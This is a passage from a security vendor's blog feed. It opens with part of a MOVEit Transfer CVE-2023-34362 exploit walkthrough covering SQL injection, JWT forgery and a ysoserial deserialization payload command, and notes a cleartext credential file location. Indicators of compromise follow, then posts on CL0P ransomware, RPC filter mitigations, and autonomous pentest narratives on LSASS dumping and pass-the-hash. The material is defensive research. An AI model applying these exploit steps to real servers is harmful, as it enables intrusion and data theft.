With entry into machine2.aspx via this backend relay of our request, we can now reach SetAllSessionVarsFromHeaders() when we pass in a transaction of session_setvars. Our Cookie header as well as all other X-siLock- headers will be passed in with our request. Analyzing the functionality of this removed function further, it will parse all headers, and if the header starts with X-siLock-SessVar it will set the corresponding variable of the session in use to the arbitrary value provided. For example, X-siLock-SessVar0: MyUsername: sysadmin will set the username of session to the builtin sysadmin. This capability unfortunately does not enable you to just assume the sysadmin role and use the application, but it does provide access to set many variables loaded in code paths which bypass being cleaned by the XHTMLClean() function from earlier.

The Path to SQL Injection

The path to the vulnerable UserGetUsersWithEmailAddress() function we took was via an unauthenticated call to guestaccess.aspx when the passed Transaction is secmsgpost. The full call chain of relevant calls is:

guestaccess.aspx -> SILGuestAccess -> SILGuestAccess.PerformAction() -> MsgEngine.MsgPostForGuest() -> UserEngine.UserGetSelfProvisionUserRecipsWithEmailAddress() -> UserEngine.UserGetUsersWithEmailAddress()

While we will not analyze the call chain in depth and all of the variable setting whack-a-mole that was needed to reach the vulnerable function, the crux of what changed with our access to session variable manipulation is in the very beginning of guestaccess.aspx’s handler in SILGuestAccess. The main function calls this.m_pkginfo.LoadFromSession(), which sets variables from session variables that we can now influence with session_setvars.


Figure 7. LoadFromSession() loads variables from the session

Along the call chain, the SelfProvisionedRecips value is extracted as a list of comma separated email addresses and never cleaned before being passed to our vulnerable function. Inspecting how the SQL query is built in our vulnerable function, we see the InstID, EscapeLikeForSQL(EmailAddress), and finally EmailAddress are formatted into the query statement. The final query statement looks like:

SELECT Username, Permissions, LoginName, Email FROM users WHERE InstID=9389 AND Deleted=0 AND (Email='<EmailAddress>' OR Email LIKE (%EscapeLikeForSQL(<EmailAddress>)) or Email LIKE (EscapeLikeForSQL(<EmailAddress>));

The part of the query AND Email='<EmailAddress>' has our uncleaned argument of SelfProvisionedRecips inserted into the query. The only caveat to this injection, is that just prior to the call the SelfProvisionedRecips variable is split on comma’s (,). Our injected SQL statement should avoid having commas to continue proper execution. We can work around needing commas by reusing the SQL injection several times to do sequential statements such as INSERT then UPDATE.

All of this information combined, an example request in Python that will set the right session variables via a request to the action=m2 endpoint and then a request to the guestaccess.aspx endpoint to inject would look like the following:

Figure 8. Python script excerpt to perform SQL injection

The Path to Administrator Session

With the ability to read and write any data within the MOVEit database, our next goal is to achieve elevated permissions from an unauthenticated session. Threat intelligence showed logs that the attackers would hit the /api/v1/auth/token endpoint, which is handled by MOVEit.DMZ.WebAPI. Authentication is handled here, and based on the session_grant parameter passed in, different authentication paths are taken. Several of these paths were explored, some more than others, but the path we decided to go after is when session_grant=external_token, which is handled by the function GrantTokenFromExtenralToken(). This type of authentication flow is used when the MOVEit Transfer application has been configured to use federated logins, specifically from Microsoft Outlook acting as the identity provider.

Assuming the application has been configured to use a federated login flow, users send a payload to the /api/v1/auth/token endpoint with a payload that contains a RS256 JWT. The decoded JWT should look like the following:

Figure 9. Example RS256 JWT

The important information here is that the MOVEit Transfer application will reach out the URL in the amurl field to retrieve the certificate that matches the given x5t signature to extract and validate that the JWT was in fact signed by the identity provider. Because we control the content of the JWT, we can point it to our own endpoint that hosts our own matching certificate that will pass validation.

We ultimately use the SQL injection from the previous paths to configure the database to think the application is configured this way, to trust our identity provider URL, and inject an external token for the builtin sysadmin user. We also use the SQL injection to pass several checks along the way to allow the sysadmin user to be able to login from any IP address.

Combining it all together we now obtain an access token for the sysadmin user and use it to list files they have access to.

Figure 10. Chaining issues to obtain sysadmin access token

The Path to Remote Code Execution

The last step of this exploit chain is to abuse the sysadmin access token to achieve remote code execution. Threat actors were observed hitting the /api/v1/folders, /api/v1/folders/<folder_id>/files?uploadType=resumable, and /api/v1/folders/<folder_id>/files?uploadType=resumable&fileId=<file_id> endpoints. Pairing that knowledge with the last difference observed in the patch related to file uploads, we begin looking at the file upload handlers in within MOVEit.DMZ.WebApi.

The only path to the function that was patched, GetFileUploadInfo(), is when a file upload is resumed that was previous in progress – which matches the call to /api/v1/folders/<folder_id>/files?uploadType=resumable&fileId=<file_id>. The specific variable they now attempt to protect is this._uploadState. Examining where that variable is referenced in the .NET DLL, we see that the function DeserializeFileUploadStream() uses it to create a MemoryStream object and then immediately uses it in a call to BinaryFormatter().Deserialize(). This is a classic .NET deserialization vulnerability. Normally, the uploadState variable would not be under attacker influence, but because we have a SQL injection, we can influence the field from which that variable is set.

Figure 11. BinaryFormatter.Deserialize() on input we control

Looking at the state of the database from which the uploadState variable is set, we find that the State value is NULL. We need this State value to contain our base64 encoded serialized .NET payload.

Figure 12. Database tabe fileuploadinfo schema

Using a tool like, we generate a payload for the formatter in use.

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "cmd.exe /C echo DIRTY MIKE AND THE BOYS WERE HERE > C:\Windows\Temp\message.txt" -o base64

Figure 13. ysoserial payload generation

The only hurdle to overcome is, that when reading the State field from the database, it expects the data to be encrypted with an organization specific encryption key. We spent some time looking at how we could extract and re-implement the encryption, but thankfully theres a simple workaround. When initiating the file upload, you can optionally provide a Comment. This comment is encrypted with that organization specific key. We can provide our base64 ysoserial payload as the comment when initiating the upload and have it do the heavy lifting for us.

To prepare the application to reach this bit of code requires several interactions:

  1. Retrieve the user’s FolderID by requesting /api/v1/folders
  2. Retrieve a FileID by starting a file upload by requesting /api/v1/folders/<folder_id>/files?uploadType=resumable and providing our payload as the Comment
  3. Use SQL injection to copy the Comment to the State field
  4. Resume the file upload triggering loading of State into uploadState and calling BinaryFormatter.Deserialize(uploadState)

The full exploit chain in action to write a file to C:\Windows\Temp\message.txt.

Figure 14. Executing the proof-of-concept exploit

Figure 15. Remote Code Execution

Our proof of concept can be found on our GitHub.

Post-Exploitation Bonus

If you find yourself on a MOVEit Transfer server that was deployed via the Azure Marketplace (and in some other cases), in C:\MOVEitDMZ_Install.INI you will find cleartext credentials for the provisioned sysadmin account, database credentials, and the service credential. All great targets for lateral movement.

Figure 16. MOVEitDMZ_Install.INI

This file is used for unattended installs, and users are given the optional to preserve it after normal installations as well.

MOVEitDMZ_Install.INI – The parameter input file for the installation. You can create an INI file by performing a standard MOVEit DMZ installation and NOT deleting the file at the end. Once you have the INI file, you can modify it in a text editor to customize the input for use as an unattended install.

Indicators of Compromise

Our exploit path may not be similar to paths taken by recent threat actors, but there are several places to look for indicators.

The database tables userexternaltokens, trustedexternaltokenproviders, and hostpermits all had entries inserted to achieve the sysadmin access token. The fileuploadinfo table was altered to obtain RCE. One should inspect these tables to look for any anomalous entries.

Log entries for endpoint traffic can be found in the following areas:

  • <InstallDir>/Logs/DMZ_WebApi.log when requests are made to /api/v1/ endpoints
  • <InstallDir>/Logs/DMZ_WEB.log when requests are made to /guestaccess.aspx and relayed messages to /machine2.aspx
  • <InstallDir>/Logs/DMZ_ISAPI.log when requests are made to /moveitisapi/moveitisapi.dll?action=m2

The post MOVEit Transfer CVE-2023-34362 Deep Dive and Indicators of Compromise appeared first on, Specialist for Autonomous Penetration Testing, Enters UK Market with Leading IT Partner Companies

By: Cassie
15 June 2023 at 15:17

Press Portal 06/15/2023 is announcing several high-profile partnerships to expand its market presence in the United Kingdom and is increasing the availability of NodeZero to enterprises in that region. NodeZero is an AI-based penetration testing platform delivered as a true SaaS offering. Organizations of all sizes use NodeZero to discover and help remediate security risks within their IT infrastructures….

Read the entire article here

The post, Specialist for Autonomous Penetration Testing, Enters UK Market with Leading IT Partner Companies appeared first on

INSIGHT – MOVEit Zero-Day Reminds Us Yet Again to Be Diligent in Monitoring Our IT Infrastructure

Over the last week, the widely reported critical security flaw in the Progress MOVEit Transfer application (CVE-2023-34362) reminded us yet again to remain vigilant in securing our IT infrastructure from potential cyber threat actors. Also, part of the #StopRansomeware campaign, Cybersecurity & Infrastructure Security Agency (CISA) published a joint Cybersecurity Advisory (CSA) detailing the importance of organizations protecting against ransomware while maintaining a pulse on the current threat landscape. According to Progress, MOVEit Transfer is used worldwide by thousands of customers, including major companies like Disney, Chase, and BlueCross Blue Shield, for managing organizations’ file transfer operations. The CL0P ransomware gang, otherwise known as Lace Tempest, is credited with initially exploiting the zero-day vulnerability and publishing an extortion note on its dark web leak site claiming to have information on hundreds of businesses.  

CVE-2023-34362 poses a significant risk to businesses relying on MOVEit for file transfer operations. The active exploitation of this vulnerability by threat actors emphasizes the need for swift action. This post is intended to help you increase your understanding of the potential impacts and add recommendations about security measures you can take to fortify their defenses and mitigate the risk posed by CVE-2023-34362

An attack targeting MOVEit’s web application could prove detrimental to any organization, because the application is responsible for interfacing with MySQL, Microsoft SQL Server, and Azure SQL database engines. This critical flaw is an SQL injection vulnerability that lets unauthenticated attackers gain access to unpatched MOVEit servers and execute arbitrary code remotely, giving them access to sensitive data, the ability to disrupt systems, or complete compromise of the file transfer infrastructure. With reports of active exploitation in the wild, it is crucial to comprehend the implications of CVE-2023-34362 on businesses relying on MOVEit.

Open-source reporting indicates that cyber threat actors are actively exploiting or seeking to exploit CVE-2023-34362 in real-world scenarios, highlighting the urgency of addressing this vulnerability. CL0P, the initial group to exploit this vulnerability, is notorious for being a “big game hunter” that targets organizations with large budgets by issuing proportionally large ransom demands – some demands have gone as high as $20 million. However, CL0P also hones and sharpens their skills by targeting smaller organizations. Additionally, they have been known to target the Public Health and Healthcare industry in the past. Some examples include: 

  • April 2020: ExecuPharm, Inc., a U.S.-based pharmaceutical research company  
  • May 2020: Carestream Dental LLC, a U.S.-based provider of dental equipment  
  • November 2020: Nova Biomedical, a U.S.-based medical device manufacturer 

While we do not have insight into how much money CL0P is demanding, they have provided the public with step-by-step instructions for would-be victims (see Graphic #1 below). As of 14 June, CL0P appears to have followed through with at least a portion of the instructions when they published the names of a handful of companies that presumably refused to contact them.  

CL0P Ransomware Gang leaves an extortion note for MOVEit Transfer application users
Graphic #1: CL0P Ransomware Gang leaves an extortion note for MOVEit Transfer application users.


CL0P has been in the ransomware game since 2019-2020 and is known for targeting managed file transfer (MFT) applications touting ransomware as a service (RaaS) to infiltrate their targets IT infrastructure. Mostly targeting MFT applications, they continue to use these holes in vulnerable software for monetary gain. In the recent past, CL0P has also been attributed to several other recent zero-day ransomware campaigns such as PaperCut, GoAnywhere MFT, SolarWinds Serv-U, and Accellion FTA. For example, in mid-March CL0P exploited the GoAnywhere MFT vulnerability (CVE-2023-0669) to gain access and steal data; and has reportedly targeted over 130 organizations worldwide. Using similar tactics, techniques, and procedures (TTPs), their main goals are disrupting daily organizational cyber activity, stealing sensitive data, and finding other opportunistic ways to disrupt or deploy further attacks.  

What Now? proactively warns customers about potential zero-day and N-day ransomware attacks and impacts so that they take immediate action to fix potential vulnerabilities and mitigate possible threats. Exploitation by any cyber threat actor poses a significant risk to businesses relying on the MOVEit web application for file transfer operations. Key Impacts on Businesses include: 

  • Data Breaches and Intellectual Property Theft (including current and former employee data)
  • Operational Disruption and Downtime
  • Manipulation of File Transfers
  • Reputational Damage and Legal Consequences

Mitigation and Recommendations:

  • Implement Regular Pentest Cadence (NodeZero)
  • Apply Security Patches and Updates (Progress Security Advisory)
  • Implement Intrusion Detection and Prevention Systems
  • Conduct Regular Security Audits
  • User Awareness and Training

In conclusion, the CVE-2023-34362 vulnerability in MOVEit’s web application poses significant risks to businesses relying on the software for file transfer operations. Exploitation of this vulnerability can result in data breaches, intellectual property theft, operational disruptions, manipulated file transfers, reputational damage, and legal consequences. To mitigate these risks, organizations should promptly apply security patches, implement regular pentest cadence, implement intrusion detection and prevention systems, conduct regular security audits, and provide user awareness and training. By taking these proactive measures, businesses can enhance their security posture and minimize the potential impacts of CVE-2023-34362 and thwart possible attacks by groups such as CL0P. It is crucial for organizations to prioritize cybersecurity and remain vigilant in addressing vulnerabilities to protect their sensitive data and maintain the trust of stakeholders. 

Please see our Horizon3 Attack Team’s blog MOVEit Transfer CVE-2023-34362 Deep Dive and Indicators of Compromise for extensive technical information!


The post INSIGHT – MOVEit Zero-Day Reminds Us Yet Again to Be Diligent in Monitoring Our IT Infrastructure appeared first on

Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-FSRVP

20 June 2023 at 19:02

Block remote MS-FSRVP functionality with RPC Filters

If Microsoft File Server Remove VSS Protocol (MS-FSRVP) is not required, administrators should block the remote MS-FSRVP functionality for non-Domain Admins on the vulnerable host using RPC filters.

    1. Create a text file with the following content:
      add rule layer=um actiontype=permit
      add condition field=if_uuid matchtype=equal data=4FC742E0-4A10-11CF-8273-00AA004AE673
      add condition field=remote_user_token matchtype=equal data=D:(A;;CC;;;DA)
      add filter
      add rule layer=um actiontype=block
      add condition field=if_uuid matchtype=equal data=4FC742E0-4A10-11CF-8273-00AA004AE673
      add filter
    2. Use the netsh command line utility to import the RPC filter from an elevated administrator prompt:
      netsh -f <FILTER_FILE_NAME>
    3. To confirm the filters are in place, you can view the current RPC filters using the following command:
      netsh rpc filter show filter

See CERT Coordination Center Vulnerability Note VU:#405600 for additional details on protecting Active Directory Certificate Services from NTLM relay attacks.

The post Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-FSRVP appeared first on

Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-RPRN

20 June 2023 at 19:10

Block remote MS-RPRN functionality with RPC Filters

If Microsoft Print System Remote Protocol (MS-RPRN) is not required, administrators should block the remote MS-RPRN functionality on the vulnerable host using RPC filters.

    1. Create a text file with the following content:
      add rule layer=um actiontype=block
      add condition field=if_uuid matchtype=equal data=12345678-1234-ABCD-EF00-0123456789AB
      add filter
    2. Use the netsh command line utility to import the RPC filter from an elevated administrator prompt:
      netsh -f <FILTER_FILE_NAME>
    3. To confirm the filters are in place, you can view the current RPC filters using the following command:
      netsh rpc filter show filter

See CERT Coordination Center Vulnerability Note VU:#405600 for additional details on protecting Active Directory Certificate Services from NTLM relay attacks.

The post Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-RPRN appeared first on

Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-DFSNM

20 June 2023 at 19:14

Block remote MS-DFSNM functionality with RPC Filters

If Microsoft Distributed File System (DFS) Namespace Management Protocol (MS-DFSNM) is not required, administrators should block the remote MS-DFSNM functionality for non-Domain Admins on the vulnerable host using RPC filters.

    1. Create a text file with the following content:
      add rule layer=um actiontype=permit
      add condition field=if_uuid matchtype=equal data=4FC742E0-4A10-11CF-8273-00AA004AE673
      add condition field=remote_user_token matchtype=equal data=D:(A;;CC;;;DA)
      add filter
      add rule layer=um actiontype=block
      add condition field=if_uuid matchtype=equal data=4FC742E0-4A10-11CF-8273-00AA004AE673
      add filter
    2. Use the netsh command line utility to import the RPC filter from an elevated administrator prompt:
      netsh -f <FILTER_FILE_NAME>
    3. To confirm the filters are in place, you can view the current RPC filters using the following command:
      netsh rpc filter show filter

See CERT Coordination Center Vulnerability Note VU:#405600 for additional details on protecting Active Directory Certificate Services from NTLM relay attacks.

The post Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-DFSNM appeared first on

Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-EVEN

20 June 2023 at 19:20

Block remote MS-EVEN functionality with RPC Filters

If Microsoft EventLog Remoting Protocol (MS-EVEN) is not required, administrators should block the remote MS-EVEN functionality on the vulnerable host using RPC filters.

    1. Create a text file with the following content:
      add rule layer=um actiontype=block
      add condition field=if_uuid matchtype=equal data=82273FDC-E32A-18C3-3F78-827929DC23EA
      add filter
    2. Use the netsh command line utility to import the RPC filter from an elevated administrator prompt:
      netsh -f <FILTER_FILE_NAME>
    3. To confirm the filters are in place, you can view the current RPC filters using the following command:
      netsh rpc filter show filter

See CERT Coordination Center Vulnerability Note VU:#405600 for additional details on protecting Active Directory Certificate Services from NTLM relay attacks.

The post Microsoft Windows Machine Account NTLM Coercion via Authenticated MS-EVEN appeared first on

You Can’t Manage Risk if You Lack Context

29 June 2023 at 16:50

Low-Level Vulnerability Leads to Domain Compromise

Although vast numbers of organizations purchase and utilize some sort of vulnerability management solution and may perform in-house penetration tests on their own networks, most struggle with knowing what not to fix because they lack context about what is truly exploitable. As a result, organizations spend vast amounts of time fixing issues that are of minimal risk.

There is a considerable difference between being vulnerable and being exploitable, and lacking context is an enormous challenge most organizations face. In many cases, organizations are using some sort of assessment tool that labels their findings with CVSS scores, but often they are of little use since these scores are primarily used to measure severity—and are not used to measure “your” risk. Severity refers to the seriousness of an issue, but risk refers to the possibility of loss or injury. If something is seen as not being severe, how much risk can really be involved? Lots.

It’s become all too clear that a more advanced pentesting approach is the only viable way to unravel the two questions that follow:

  1. How do we determine the difference between weaknesses that make our organization vulnerable vs. weaknesses that make us exploitable?
  2. How do we accurately prioritize each occurrence of a vulnerability finding based on its downstream impacts, and what should we fix first?

Let’s look at an example

An SMB Signing Not Required vulnerability is a notable example of having a low severity CVSS score (~5.0) but can still be a substantial risk. The vulnerability is viewed as elevating risk because an unauthenticated, remote attacker could potentially exploit it to conduct man-in-the-middle attacks. Most people believe these attacks are difficult to pull off but that is not always the case. Remember, risk is all about the possibility of loss or injury.

Although SMB Signing Not Required has a low CVSS score, a savvy attacker can chain this misconfiguration together with other issues and become a Domain Administrator, compromise hosts and users, and/or gain access to sensitive data. And even worse, a run-of-the-mill vulnerability scanner will classify all occurrences of SMB Signing Not Required as “low” because vulnerability scanners lack the attacker’s perspective and provide little, if any context.

How is NodeZero™ different?

NodeZero is the industry’s first fully autonomous pentesting platform and is far more advanced than your typical vulnerability scanner. NodeZero will utilize each occurrence of an issue in an attack path, then it will accurately score each occurrence of that weakness based on its downstream impacts (see Figure 1), capturing the proof of exploitation along the way. In this example, NodeZero:

  1. Provides a true vulnerability SCORE
  2. Supplies the NodeZero WEAKNESS ID
  3. Delivers context into the number of DOWNSTREAM IMPACTS
  4. Shows all potential ATTACK PATHS
  5. Provides TIME TO DISCOVER
  6. And allows the user to select and view PROOFS

When looking at the SCORE column in Figure 1, we see that this risk is a 10+. Then when looking at the DOWNSTREAM IMPACT column, the at-risk hosts are exploitable to one or more of the following outcomes:

  • Domain Compromise
  • Host Compromise
  • Domain User Compromise

And according to NodeZero, there are at least 73 attack paths where this vulnerability could be exploited. This is what we mean by “context-based scoring” which is much different than a CVSS score.

Figure 1

NodeZero has proven that a low severity issue suddenly has an extremely elevated risk of exploitation because it knows it could exploit these vulnerabilities and achieve domain, host, and/or user compromise.

Security teams now get context on what to prioritize

Once a security team receives the results from a NodeZero, they now understand what to prioritize for remediation. When they have remediated the issues at hand, they normally want to verify that they have properly fixed each occurrence of this issue.

Rather than having to rerun the entire pentest, security teams can select the specific occurrences they want to test and execute a “retesting” workflow on NodeZero, which is a narrowly scoped pentest that only checks for those specific weaknesses. Not only do they immediately know what to fix, they can also prove that their fix was effective. This is a valuable time-saving feature.

Key takeaway

Context-based scoring on downstream impacts, combined with our retesting workflow, is one of the most used features within NodeZero. This enables organizations to accurately prioritize fixing security weaknesses that can be exploited, then quickly verifying that the detected issues have been remediated. In all reality, context into risk is what matters most.

The post You Can’t Manage Risk if You Lack Context appeared first on

Veeam CVE Leads to Full Compromise

26 July 2023 at 18:15

Recent CVE Affecting Veeam Backup Software Leads to Domain and AWS Takeover

Veeam Backup and Replication software is commonly used by enterprises for data protection and ransomware recovery. Earlier this year a vulnerability affecting Veeam,CVE-2023-27532, was disclosed. This vulnerability enables attackers to dump highly privileged credentials used by Veeam for backup operations.

NodeZero has been able to successfully exploit the Veeam CVE in many environments. In the example below, NodeZero leveraged the Veeam vulnerability to fully compromise a client’s on-prem environment and AWS infrastructure.

To be clear, attack paths that NodeZero discovers are completely valid paths that an attacker could take, and in doing so, can completely lead to compromise. This is a real attack performed by NodeZero with no human penetration testers involved. The attack was executed safely against production systems that were not in a lab environment.

Attack Path #1: The Path to Domain Compromise

In this attack path, NodeZero leveraged 4 weaknesses, one being the recent Veeam CVE to become domain admin. The attack path involved 2 compromised credentials and spanned 4 hosts.

NodeZero started off as an unauthenticated member of the internal network. Then:

  1. NodeZero was launched from host x.x.x.x on ~Jun 19
  2. NodeZero discovered the Veeam Backup and Replication service running in the environment on port 9401.
  3. NodeZero identified that the Veeam service is vulnerable to CVE-2023-27532 (Veeam Backup and Replication Credential Disclosure Vulnerability). NodeZero exploited the vulnerability to dump cleartext credentials from Veeam.
  4. One of the credentials NodeZero acquired from Veeam is for a domain user, service1. NodeZero verified service1’s credential by logging into the domain domain1 as that user over SMB.
  5. NodeZero discovered that service1 has local Administrator privileges on a Windows machine, machine1. NodeZero raised a new weakness, H3-2022-0086: Domain User with Local Administrator Privileges.
  6. Logged in as service1 on machine1, NodeZero dumped credentials (NTLM hashes) for all local users from the Security Account Manager (SAM) database. NodeZero raised a weakness H3-2021-0042: Credential Dumping – Security Account Manager (SAM) Database
  7. One of the NTLM hashes NodeZero acquired from the SAM dump on machine1 is for a local user admin1. Using a Pass-the-Hash attack, NodeZero discovered that the credential for admin1 also happens to be a domain user on domain1. NodeZero raised a weakness H3-2022-0085: Credential Reuse – Shared Windows Local User and Domain User Accounts
  8. NodeZero further identified that domain user admin1 is a domain admin.

In other words, NodeZero proved it could become a domain admin and takeover all machines connected to the domain in approximately 2.5 hours. Figure 1 highlights this attack path.

Figure 1

Attack Path #2: The Path to AWS Compromise

Now let’s look at another attack path in the same environment that led to full AWS account compromise via the same Veeam CVE.

  1. NodeZero was launched from host x.x.x.x on ~Jun 19
  2. NodeZero discovered CVE-2023-27532: Veeam Backup and Replication Credential Disclosure Vulnerability affecting the MC-NMF service on Veeam1 port 9401
  3. NodeZero discovered an AWS Access Key XXXXXXXXXXXXXXXXXXXX on the MC-NMF service on Veeam1 port 9401 by exploiting CVE-2023-27532: Veeam Backup and Replication Credential Disclosure Vulnerability
  4. NodeZero verified the credential for AWS admin user aws1 in AWS account xxxxxxxxxxxx on AWS STS (Security Token Service)

NodeZero executed the attack path in Figure 2 in about 1 hour and 20 minutes. NodeZero would go on to compromise other AWS accounts this organization used with the same credential.

Figure 2

Key Takeaways

The attack path examples above highlights the value of autonomous pentesting.

One of the interesting aspects of the Veeam CVE is that it is rated as a 7.5 (High) by the National Vulnerability Database (NVD). In many organizations, this vulnerability would not be prioritized for patching relative to other Critical level vulnerabilities. The reality, as proven here by NodeZero, is that exploiting this vulnerability can lead to full compromise. NodeZero can be used to assess the true impact of a vulnerability in any environment

In addition to the Veeam CVE, NodeZero also identified and exploited other important weaknesses common in many environments: over-privileged domain users, insufficient EDR controls to prevent credential dumping, and credential reuse. In the attack path to domain compromise, the Veeam CVE provided NodeZero initial access, and the subsequent weaknesses enabled NodeZero to take over the domain. NodeZero performed the same actions a human pentester would by chaining multiple weaknesses together to arrive at the greatest impact possible.

The post Veeam CVE Leads to Full Compromise appeared first on

Low-Level Credentials Can Get Big Gains

26 July 2023 at 18:15

Combining Compromised Credentials Enables Domain Takeover

When running internal phishing campaigns to help train employees, one challenge IT security teams face is explaining to leaders, “why the credentials of an intern (or whatever level employee) are valuable to attackers.” The common pushback security teams normally hear is, “They are an intern. They do not have access to anything critical, so why is it so important?”

Demonstrating how an intern’s credentials, combined with other issues, could lead to a domain compromise, sensitive data exposure, or other critical impacts is not an easy task when organizations do not have something like NodeZero™ on hand.

A credential injection test

A terrific way for security teams to tell the end-to-end story to leaders is to “inject” a low-level user’s credentials into a running NodeZero penetration test. NodeZero will then use those credentials as it identifies ways to compromise the environment.

Below is an example of a real attack performed by NodeZero with no human penetration testers or red teams involved. NodeZero started with the privileges of a low-level domain user and ultimately ended up fully compromising the domain. The attack was executed safely against production systems that were not in a lab environment.

Attack Path to Domain Compromise
  1. In this case, NodeZero started out as an authenticated member of the internal network. NodeZero was given the credential for domain user user1.
  2. NodeZero verified the credential for domain user user1 in domain domain1 over SMB.
  3. NodeZero discovered that user1 has local Administrator privileges on a Windows machine, machine1. NodeZero raised a new weakness, H3-2022-0086: Domain User with Local Administrator Privileges.
  4. Logged in as user1 on machine1, NodeZero dumped credentials from LSASS memory. NodeZero raised a weakness H3-2021-0044: Credential Dumping – Local Security Authority Subsystem Service (LSASS) Memory.
  5. Among the credentials dumped from LSASS memory on machine1 is the NTLM hash for domain user user2. Using a Pass-The-Hash attack, NodeZero verified the credential for user2 against domain1 over SMB.
  6. NodeZero discovered that user2 has local Administrator privileges on another Windows machine, machine2. NodeZero raised a new weakness, H3-2022-0086: Domain User with Local Administrator Privileges.
  7. Logged in as user2 on machine2, NodeZero again dumped credentials from LSASS memory. NodeZero raised a weakness H3-2021-0044: Credential Dumping – Local Security Authority Subsystem Service (LSASS) Memory.
  8. Among the credentials dumped from LSASS memory on machine1 is the NTLM hash for domain user admin1. Using a Pass-The-Hash attack, NodeZero verified the credential for admin1 against domain1 over SMB.
  9. NodeZero further identified that domain user admin1 is a domain admin.
How can this work?


  • A domain user also has local admin rights.
  • With local admin rights an attacker can access sensitive processes like LSASS.

LSASS stores credentials in memory for users active on the machine. The purpose of keeping these credentials in memory is for a form of single sign on, so the user does not have to reinput credentials for network resources shares, or services within the domain.

Once LSASS is dumped, additional credentials can be harvested and used to log into adjacent machines, where LSASS can be dumped again (and again, and again.)

It is highly likely that at some point, an LSASS dump will contain a privileged credential (e.g., Service Account, Domain Admin account, etc.)

In addition, the attacker has access to every system and data resource a compromised domain user credential has access to, unless those resources are MFA’d, but that is atypical for things like file shares and databases.

Note: Typically, EDR solutions should be able to block dumping credentials from LSASS, but in practice, the effectiveness of EDR solutions can vary widely depending on how they are configured.

The likely outcome

From something as simple as gaining a low-level employee’s credentials can allow attackers to eventually become a domain admin, which means the domain is fully compromised, and all hosts, domain user accounts, data, infrastructure, and applications tied to that domain should be considered fully compromised as well. Additionally, applications running on a domain-joined machine or any application that uses Active Directory integration to authenticate users should be considered fully compromised too.

Attack path details taken from NodeZero

As shown in Figure 1, during the attack, NodeZero leveraged:

  • H3-2021-086: Domain User with Local Admin
  • H3-2021-0044: LSASS Dump
  • H3-2021-0044: LSASS Dump
  • H3-2021-086: Domain User with Local Admin

The attack path involved 3 compromised credentials:

  • Domain user user1 (injected into the pentest)
  • Domain user user2
  • Domain admin admin1

The attack spanned 5 hosts

Figure 1

Key takeaway

This attack path is very common in internal pentests and is typical of the methods real-world attackers use once they have breached the perimeter. Not a single CVE was used in this attack, no humans were involved in this attack, just NodeZero pivoting with credentials and eventually becoming Domain Admin in a little over six hours. The key takeaway is to ensure the least privilege access for users. Domain users having local admin privileges is what led to LSASS dumping twice in this case. In addition, tuning EDR solutions to detect and block credential dumping can help.

The post Low-Level Credentials Can Get Big Gains appeared first on